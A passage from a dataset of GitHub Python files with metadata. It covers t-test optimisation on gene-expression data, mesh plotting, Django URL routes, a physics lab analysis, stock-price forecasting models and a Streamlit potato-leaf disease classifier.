xVals2, yVals2)\r\n dist1 = future.result()\r\n dist2 = future1.result()\r\n\r\n # perform the student's t test\r\n t_value, p_value = tTest(dist1, dist2)\r\n\r\n return t_value, p_value\r\n\r\nif __name__==\"__main__\":\r\n #t0 = time.time()\r\n #for x in range(100):\r\n #t, p = RandomTtest(1, 0, 100_000, [-5, 5], 100, 1, 0, 100_000, [-5, 5], 100)\r\n #t1 = time.time()\r\n #print(p, t1-t0)\r\n\r\n # load in the expression values\r\n dfQual = pd.read_csv(r\"C:\\Users\\noahb\\OneDrive\\Documents\\Tensorflow_Tutorial\\mini_project\\NSCLC_Data\",\r\n index_col=\"Unnamed: 0\")\r\n print(dfQual.head())\r\n\r\n # seperate the healthy and unhealthy samples into independent dataframes pt 1 - get list of\r\n # patient ids\r\n\r\n # import the file\r\n df = pd.read_csv(r\"C:\\Users\\noahb\\OneDrive\\Documents\\Tensorflow_Tutorial\\mini_project\\descriptors.txt\")\r\n\r\n # create new df\r\n descriptors_df = pd.DataFrame(data=None, columns=['class', 'name']) # create df with two columns\r\n for x in range(0, 310): # iterate through 155 critical rows (somereason does each twice)\r\n row = [] # set appending row to zero\r\n temp = [str(df.iloc[x]), str(df.iloc[x + 1])] # get a holder for the two values\r\n\r\n if \"low\" in temp[0]: # get class for first entry\r\n row.append(\"low\")\r\n elif \"high\" in temp[0]:\r\n row.append(\"high\")\r\n else:\r\n continue\r\n\r\n if \"GSM\" in temp[1]: # get GSM number from each entry, it's at a strange spot\r\n row.append(temp[1][temp[1].find('GSM'):temp[1].find('GSM') + 10])\r\n\r\n row_dict = {'class': row[0], 'name': row[1]} # create appending dictionary\r\n descriptors_df = descriptors_df.append(row_dict, ignore_index=True) # append dictionary to df\r\n\r\n # slight modification to index\r\n descriptors_df = descriptors_df.set_index('name') # set name of patient as index to their status\r\n print(descriptors_df.head())\r\n\r\n # seperate the healthy and unhealthy samples into independent dataframes pt 2\r\n # create list of low risk samples\r\n lowRisk = []\r\n for x in range(len(descriptors_df.iloc[:, 0])):\r\n if descriptors_df.iloc[x, 0] == 'low':\r\n lowRisk.append(descriptors_df.index[x])\r\n\r\n # create list of high risk samples\r\n highRisk = []\r\n for x in range(len(descriptors_df.iloc[:, 0])):\r\n if descriptors_df.iloc[x, 0] == 'high':\r\n highRisk.append(descriptors_df.index[x])\r\n\r\n # create low risk data frame\r\n dfLow = dfQual.loc[:, lowRisk] # 1000 ids\r\n\r\n # create high risk data frame\r\n dfHigh = dfQual.loc[:, highRisk] # 1000 ids\r\n\r\n # reduce the number of rows (0-1000)\r\n dfHigh = dfHigh.iloc[0:10_000, :]\r\n dfLow = dfLow.iloc[0:10_000, :]\r\n\r\n # qualities element - [id, mean, standard deviation]\r\n # track qualities of dfLow\r\n qualitiesLow = []\r\n for x in range(len(dfLow.index)):\r\n z = dfLow.iloc[x, :]\r\n identity = dfLow.index[x]\r\n stdev = statistics.stdev(z)\r\n mean = statistics.mean(z)\r\n qualitiesLow.append([identity, stdev, mean])\r\n print(qualitiesLow[0:5])\r\n\r\n # qualities element - [id, mean, standard deviation]\r\n # track qualities of dfHigh\r\n qualitiesHigh = []\r\n for x in range(len(dfHigh.index)):\r\n z = dfHigh.iloc[x, :]\r\n identity = dfHigh.index[x]\r\n stdev = statistics.stdev(z)\r\n mean = statistics.mean(z)\r\n qualitiesHigh.append([identity, stdev, mean])\r\n print(qualitiesHigh[0:5])\r\n\r\n # call function in order: stdev1, mean1, num_points1, range_of_values1, number_of_bins1,\r\n # stdev2, mean2, num_points2, range_of_values2, number_of_bins2\r\n t0 = time.time()\r\n p_val = []\r\n for x in range(len(qualitiesLow)): # range(len(qualitiesLow)):\r\n t, p = RandomTtest(qualitiesLow[x][2], qualitiesLow[x][1], 100_000,\r\n [-37 + qualitiesLow[x][1], 37 + qualitiesLow[x][1]], 100, qualitiesHigh[x][2],\r\n qualitiesHigh[x][1], 100_000, [-37 + qualitiesHigh[x][1], 37 + qualitiesHigh[x][1]],\r\n 100)\r\n p_val.append(p)\r\n t1 = time.time()\r\n print(len(p_val), t1-t0)\r\n\r\n#final solution was to use numba instead of cython\r\n#using the time module, the numba time was roughly 1.83 seconds compared to the normal 48.85 under these parameters t, p = RandomTtest(1, 0, 1_000_000, [-5, 5], 100, 1, 0, 1_000_000, [-5, 5], 100)\r\n#that's an increase of over 26x!!\r\n#multithreading the flattening algorithm had an impact of reducing the time with the same parameters to roughly 1.7 seconds\r\n#unfortunately, multitasking the distribution making had no impact or even made the time worse for some trials, this is unexpected but interesting\r\n#by reducing the sim to 100,000 points each dist, the time is reduced to roughly 1.5s, I think this is the best selection of hyperparameter\r\n#also experimented with removing @jit on certain functions, got down to ~1.15s", "repo_name": "thatguynoah/Bio-IA", "sub_path": "optimizedTTestProc.py", "file_name": "optimizedTTestProc.py", "file_ext": "py", "file_size_in_byte": 8866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.linspace", "line_number": 19, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 22, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 22, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "numba.jit", "line_number": 16, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 39, "usage_type": "call"}, {"api_name": "random.random", "line_number": 39, "usage_type": "call"}, {"api_name": "random.random", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 49, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 63, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numba.jit", "line_number": 34, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 74, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 87, "usage_type": "call"}, {"api_name": "scipy.stats.ttest_ind", "line_number": 113, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 113, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 129, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 129, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 129, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 148, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 156, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 159, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 210, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 211, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 221, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 222, "usage_type": "call"}, {"api_name": "time.time", "line_number": 228, "usage_type": "call"}, {"api_name": "time.time", "line_number": 236, "usage_type": "call"}]} +{"seq_id": "17872530754", "text": "#%%\nfrom ctypes import c_int\nimport slim4\nfrom slim4 import slim2d\nimport os\nimport numpy as np\nimport time\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport cmocean\n\nfrom slim4.slimcl import cu as launcher\nfrom stommel_ref import UVEtaAnalytic as analytic\nfrom line_profiler import LineProfiler\n\n#%%\ntic = time.time()\nscalar = np.float32\ncc = \"gcc\"\n############# Mesh initialization #############\ncomm_rank = slim4.mpi_rank()\ncomm_size = slim4.mpi_size()\nnode_rank = launcher.get_node_rank()\nnode_size = launcher.get_node_size()\nif comm_size > 1 :\n partname = slim2d.partition_mesh(\"square.msh\")\n mesh = slim2d.Mesh(partname, None)\nelse :\n fpath = os.path.dirname(os.path.realpath(__file__))\n mesh = slim2d.Mesh(fpath + \"/square.msh\",None)\n\ncmap = matplotlib.cm.get_cmap('brg')\nnt = len(mesh.x)\ncolor = cmap(np.linspace(0, 1, nt))\n\nplt.figure(figsize=(6,6))\nneighbours = mesh.neighbours\ncentroids = mesh.x.mean(axis=1)\nplt.triplot(mesh.xnodes[:, 0], mesh.xnodes[:, 1], mesh.triangles[:mesh.n_triangles], color=\"k\", lw=1, alpha=0.9)\nfor i in range(nt-1):\n plt.plot(centroids[i:i+2,0], centroids[i:i+2,1], '.-', lw=1, alpha=0.5, c=color[i])\nplt.gca().set_aspect(1)\nplt.gca().axis(\"off\")\nplt.savefig(\"Figures/order0.pdf\")\nos.system(\"pdfcrop %s %s\" % (\"Figures/order0.pdf\", \"Figures/order0.pdf\"))\nplt.show()\n\nmesh.reorder_hilbert()\nplt.figure(figsize=(6,6))\nneighbours = mesh.neighbours\ncentroids = mesh.x.mean(axis=1)\nplt.triplot(mesh.xnodes[:, 0], mesh.xnodes[:, 1], mesh.triangles[:mesh.n_triangles], color=\"k\", lw=1, alpha=0.9)\nfor i in range(nt-1):\n plt.plot(centroids[i:i+2,0], centroids[i:i+2,1], '.-', lw=1, alpha=1, c=color[i])\nplt.gca().set_aspect(1)\nplt.gca().axis(\"off\")\nplt.savefig(\"Figures/orderh.pdf\")\nos.system(\"pdfcrop %s %s\" % (\"Figures/orderh.pdf\", \"Figures/orderh.pdf\"))\nplt.show()\n\n\n# %%\n", "repo_name": "MiguelDLC/plottools", "sub_path": "stommesh.py", "file_name": "stommesh.py", "file_ext": "py", "file_size_in_byte": 1831, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 18, "usage_type": "attribute"}, {"api_name": "slim4.mpi_rank", "line_number": 21, "usage_type": "call"}, {"api_name": "slim4.mpi_size", "line_number": 22, "usage_type": "call"}, {"api_name": "slim4.slimcl.cu.get_node_rank", "line_number": 23, "usage_type": "call"}, {"api_name": "slim4.slimcl.cu", "line_number": 23, "usage_type": "name"}, {"api_name": "slim4.slimcl.cu.get_node_size", "line_number": 24, "usage_type": "call"}, {"api_name": "slim4.slimcl.cu", "line_number": 24, "usage_type": "name"}, {"api_name": "slim4.slim2d.partition_mesh", "line_number": 26, "usage_type": "call"}, {"api_name": "slim4.slim2d", "line_number": 26, "usage_type": "name"}, {"api_name": "slim4.slim2d.Mesh", "line_number": 27, "usage_type": "call"}, {"api_name": "slim4.slim2d", "line_number": 27, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 29, "usage_type": "call"}, {"api_name": "slim4.slim2d.Mesh", "line_number": 30, "usage_type": "call"}, {"api_name": "slim4.slim2d", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.cm.get_cmap", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.triplot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "os.system", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.triplot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "os.system", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "11608723102", "text": "# -*- coding: utf-8 -*-\n# @Time : 2019/11/29 14:25\n# @Author : XiaTian\n# @File : urls.py\n\nfrom django.urls import path\nfrom Login import views\n\nurlpatterns = [\n path('register/', views.RegisterView.as_view()),\n path('login', views.LoginView.as_view()),\n path('test_auth', views.TestView.as_view()),\n]", "repo_name": "summer5625/Mygit", "sub_path": "第九模块_vue和路飞学城/luffy_city/luffy_project/Login/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "Login.views.RegisterView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "Login.views.RegisterView", "line_number": 10, "usage_type": "attribute"}, {"api_name": "Login.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "Login.views.LoginView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "Login.views.LoginView", "line_number": 11, "usage_type": "attribute"}, {"api_name": "Login.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "Login.views.TestView.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "Login.views.TestView", "line_number": 12, "usage_type": "attribute"}, {"api_name": "Login.views", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "28529899279", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom uncertainties import ufloat\r\nimport uncertainties.unumpy as unp\r\nimport scipy as scp\r\n\r\ntemp, t_oben, t_unten = np.genfromtxt(\"Messdaten_grKu_steigendeTemp.txt\", unpack=True)\r\nn=10\r\nartm_t_oben =np.zeros(n) #arithmetische Mittel\r\nartm_t_unten =np.zeros(n)\r\nsdev_t_oben =np.zeros(n) #standardabweichungen \r\nsdev_t_unten =np.zeros(n)\r\nsingle_temp =np.zeros(n) #array mit Temperaturen, aber jede Temperatur nur einmal\r\n\r\nfor j in range(n):\r\n for i, temperature in enumerate(temp):\r\n\r\n if i==2*j and temp[i] == temp[i+1]:\r\n artm_t_oben[j] = (t_oben[i] + t_oben[i+1])/2\r\n artm_t_unten[j] = (t_unten[i] + t_unten[i+1])/2\r\n sdev_t_oben[j] = np.std(t_oben[j:j+2])\r\n sdev_t_unten[j] = np.std(t_unten[j:j+2])\r\n single_temp[j]= temp[i]\r\n\r\n# Hier werden paarweise die Mittewerte von den \"oben\" und den \"unten\" Messwerten berechnet\r\n\r\nprint(\"artm_t_oben \",artm_t_oben)\r\nprint(\"artm_t_unten\",artm_t_unten)\r\nprint(\"sdev_t_oben \",sdev_t_oben)\r\nprint(\"sdev_t_unten\",sdev_t_unten)\r\nprint(\"single_temp\",single_temp)\r\n\r\nnp.savetxt('Messreihe3.txt', np.column_stack([artm_t_oben, artm_t_unten, sdev_t_oben, sdev_t_unten]), header=\"artm_t_oben artm_t_unten sdev_t_oben sdev_t_unten\")\r\n\r\nunc_t_oben = unp.uarray(artm_t_oben, sdev_t_oben)\r\nunc_t_unten = unp.uarray(artm_t_unten, sdev_t_unten)\r\n\r\n\r\nplt.errorbar(single_temp, artm_t_oben, yerr=sdev_t_oben, fmt='x', label=r'Laufzeiten oben')\r\nplt.errorbar(single_temp, artm_t_unten, yerr=sdev_t_unten, fmt='x', label=r'Laufzeiten unten')\r\n\r\nplt.ylabel(\"t / \\\\unit{{\\\\s}}\")\r\nplt.xlabel(\"T / \\\\unit{{\\\\celsius}}\")\r\nplt.savefig(\"build/Messreihe3.pdf\")\r\n### Berechnungen eta nach Temperatur und Plot dafür ###", "repo_name": "Enno-Enno/PraktikumWS2223", "sub_path": "01_v207/Messreihe3.py", "file_name": "Messreihe3.py", "file_ext": "py", "file_size_in_byte": 1763, "program_lang": "python", "lang": "de", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.genfromtxt", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 33, "usage_type": "call"}, {"api_name": "uncertainties.unumpy.uarray", "line_number": 35, "usage_type": "call"}, {"api_name": "uncertainties.unumpy", "line_number": 35, "usage_type": "name"}, {"api_name": "uncertainties.unumpy.uarray", "line_number": 36, "usage_type": "call"}, {"api_name": "uncertainties.unumpy", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.errorbar", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.errorbar", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "3576124945", "text": "# Adapted from: https://www.kaggle.com/code/ryanholbrook/forecasting-with-machine-learning/tutorial\nfrom pathlib import Path\n\nimport plotly.graph_objects as go\nfrom plotly.colors import n_colors\n\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression, MultiTaskLasso\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nfrom xgboost import XGBRegressor\nfrom joblib import dump, load\n\ndef create_visualization(y_test:pd.DataFrame, y_pred: pd.DataFrame) -> go.Figure:\n fig = go.Figure()\n\n colorscale = n_colors('rgb(67, 198, 172)', 'rgb(25, 22, 84)', len(y_pred), colortype='rgb')\n\n for i, (index, row) in enumerate(y_pred.iterrows()):\n fig.add_trace(go.Scatter(x=pd.period_range(start=index, periods=len(row)).to_timestamp(), y=row, line=dict(color=colorscale[i])))\n fig.add_trace(go.Scatter(x=y_test.index, y=y_test.y_step_1, line=dict(color='black')))\n fig.update_layout(showlegend=False)\n \n return fig\n\n\napple_stock = pd.read_csv(\"./finance/apple.csv\", index_col='Date')\napple_stock.index = pd.to_datetime(apple_stock.index)\napple_stock.sort_index(inplace=True)\n\ndef make_lags(ts, lags, lead_time=1):\n return pd.concat(\n {\n f'y_lag_{i}': ts.shift(i)\n for i in range(lead_time, lags + lead_time)\n },\n axis=1)\n\n# Thirty days of lag features\ny = apple_stock.Close.copy()\nX = make_lags(y, lags=30).fillna(0.0)\n\n\ndef make_multistep_target(ts, steps):\n return pd.concat(\n {f'y_step_{i + 1}': ts.shift(-i)\n for i in range(steps)},\n axis=1)\n\n\n# 7 Day forecast\ny = make_multistep_target(y, steps=7).dropna()\n\n# Shifting has created indexes that don't match. Only keep times for\n# which we have both targets and features.\ny, X = y.align(X, join='inner', axis=0)\n\n# Create splits\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, shuffle=False)\n\n\n### Model 1: Basic Direct LinReg\nmodel = LinearRegression()\nmodel.fit(X_train, y_train)\ndump(model, './finance/dir_linreg.joblib')\n\ny_fit = pd.DataFrame(model.predict(X_train), index=X_train.index, columns=y.columns)\ny_pred = pd.DataFrame(model.predict(X_test), index=X_test.index, columns=y.columns)\n\ntrain_rmse = mean_squared_error(y_train, y_fit, squared=False)\ntest_rmse = mean_squared_error(y_test, y_pred, squared=False)\nprint((f\"Train RMSE: {train_rmse:.2f}\\n\" f\"Test RMSE: {test_rmse:.2f}\"))\n\ncreate_visualization(y_train, y_fit).show()\ncreate_visualization(y_test, y_pred).show()\n\n\n### Model 2: Basic Direct Lasso\nmodel = MultiTaskLasso()\nmodel.fit(X_train, y_train)\ndump(model, './finance/dir_lasso.joblib')\n\ny_fit = pd.DataFrame(model.predict(X_train), index=X_train.index, columns=y.columns)\ny_pred = pd.DataFrame(model.predict(X_test), index=X_test.index, columns=y.columns)\n\ntrain_rmse = mean_squared_error(y_train, y_fit, squared=False)\ntest_rmse = mean_squared_error(y_test, y_pred, squared=False)\nprint((f\"Train RMSE: {train_rmse:.2f}\\n\" f\"Test RMSE: {test_rmse:.2f}\"))\n\ncreate_visualization(y_train, y_fit).show()\ncreate_visualization(y_test, y_pred).show()\n\n\n### Model 3: DirRec XGBoost\nfrom sklearn.multioutput import RegressorChain\n\nmodel = RegressorChain(XGBRegressor())\nmodel.fit(X_train, y_train)\ndump(model, './finance/dirrec_xgb.joblib')\n\ny_fit = pd.DataFrame(model.predict(X_train), index=X_train.index, columns=y.columns)\ny_pred = pd.DataFrame(model.predict(X_test), index=X_test.index, columns=y.columns)\n\ntrain_rmse = mean_squared_error(y_train, y_fit, squared=False)\ntest_rmse = mean_squared_error(y_test, y_pred, squared=False)\nprint((f\"Train RMSE: {train_rmse:.2f}\\n\" f\"Test RMSE: {test_rmse:.2f}\"))\n\ncreate_visualization(y_train, y_fit).show()\ncreate_visualization(y_test, y_pred).show()\n\n# How to use XGBoost for stock prediction: https://www.kaggle.com/code/mtszkw/xgboost-for-stock-trend-prices-prediction\n\n\n", "repo_name": "TechClubHSG/Fall22_PG_DSCS_How_to_Streamlit", "sub_path": "finance/finance.py", "file_name": "finance.py", "file_ext": "py", "file_size_in_byte": 3868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.DataFrame", "line_number": 14, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 15, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 15, "usage_type": "name"}, {"api_name": "plotly.colors.n_colors", "line_number": 17, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 20, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 20, "usage_type": "name"}, {"api_name": "pandas.period_range", "line_number": 20, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 21, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 21, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 14, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 14, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 32, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 63, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 67, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.linear_model.MultiTaskLasso", "line_number": 79, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.multioutput.RegressorChain", "line_number": 97, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 97, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "9986432520", "text": "import streamlit as st\nimport tensorflow as tf\nfrom PIL import Image, ImageOps\nimport numpy as np\n\nst.set_page_config(\n page_title=\"Classification of Potato Leaf using the Leaves\",\n layout=\"wide\" # Add this line to enable the dark theme\n)\n\nhide_streamlit_style = \"\"\"\n <div style=\"background:#000000 ;padding:10px\">\n <h2 style=\"color:white;text-align:center;\"> Potato Leaf Disease Detection</h2>\n </div>\n \"\"\"\nst.markdown(hide_streamlit_style, unsafe_allow_html=True)\nst.set_option('deprecation.showfileUploaderEncoding', False)\n@st.cache_resource\ndef load_model():\n model=tf.keras.models.load_model('potato_leaf_detection.h5')\n return model\n\nwith st.spinner('Model is being loaded..'):\n model=load_model()\n\nst.write(\"\"\"\n # The Potato Leaf can be classified as:\n ### Early Blight\n ### Healthy\n ### Late Blight\n \"\"\"\n )\n# st.write(\n# \"\"\"\n# ### Early Blight\n# ### Healthy\n# ### Late Blight\n# \"\"\"\n# )\n\ndef is_image(file):\n try:\n img = Image.open(file)\n img.verify() # Check if the file is a valid image\n return True\n except:\n return False\n\ndef is_leaf_image(image_data):\n try:\n img = Image.open(image_data)\n img.verify() # Check if the image is valid\n return np.any(np.array(img)) # Check if the image contains any pixels\n except:\n return False\n\nfile = st.file_uploader(\"\", type=[\"jpg\", \"png\", \"jpeg\", \"heic\"])\n\ndef import_and_predict(image_data, model):\n size = (256,256)\n image = ImageOps.fit(image_data, size, Image.ANTIALIAS)\n img = np.asarray(image)\n img_reshape = img[np.newaxis,...]\n prediction = model.predict(img_reshape)\n return prediction\n\nif file is None:\n st.text(\"Please upload an image file\")\nelse:\n if is_image(file):\n if is_leaf_image(file):\n image = Image.open(file)\n st.image(image, use_column_width=True)\n predictions = import_and_predict(image, model)\n class_names = ['Early blight', 'Late blight', 'Healthy']\n\n st.write(\"Prediction Results:\")\n for i, class_name in enumerate(class_names):\n probability = predictions[0][i]\n confidence = probability * 100\n st.write(f\"{class_name}: {confidence:.2f}%\")\n\n predicted_class_index = np.argmax(predictions[0])\n predicted_class = class_names[predicted_class_index]\n st.write(f\"Prediction: {predicted_class} with confidence {predictions[0][predicted_class_index] * 100:.2f}%\")\n if predicted_class == 'Healthy':\n st.success(\"Classified as Healthy\")\n else:\n st.warning(f\"Classified as {predicted_class}\")\n else:\n st.warning(\"Not a leaf image! Please upload an image of a leaf.\")\n else:\n st.warning(\"Not a valid image file! Please upload an image (jpg, png, jpeg, or heic).\")\n\ntemp = \"\"\"\"\"\"\nst.markdown(temp, unsafe_allow_html=True)\n", "repo_name": "Karthikkolli17/potatoMotato", "sub_path": "potatoApp.py", "file_name": "potatoApp.py", "file_ext": "py", "file_size_in_byte": 3048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "streamlit.set_page_config", "line_number": 6, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 16, "usage_type": "call"}, {"api_name": "streamlit.set_option", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 20, "usage_type": "attribute"}, {"api_name": "streamlit.cache_resource", "line_number": 18, "usage_type": "attribute"}, {"api_name": "streamlit.spinner", "line_number": 23, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 43, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 43, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 51, "usage_type": "call"}, {"api_name": 